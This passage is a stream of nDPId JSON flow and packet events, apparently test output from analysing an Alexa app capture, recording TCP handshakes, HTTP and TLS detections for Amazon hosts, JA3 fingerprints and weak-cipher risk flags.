-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044488,"flow_last_seen":1490976044488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044488,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1490976044488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044488,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8GDVAAEAGLrqsECrYNF7ohrJsAbtUI1eFAAAAAKAC\/\/+juwAAAgQFtAQCCAoA9k+wAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044502,"flow_last_seen":1490976044502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1490976044502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044502,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807lAAEAGczWsECrYNF7ohrJtAbvCg5wLAAAAAKAC\/\/\/w0QAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044509,"flow_last_seen":1490976044509,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044509,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1490976044509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044509,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dBBAAEAG0t6sECrYNF7ohrJuAbv0jjuiAAAAAKAC\/\/8fLwAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044521,"flow_last_seen":1490976044521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044521,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} 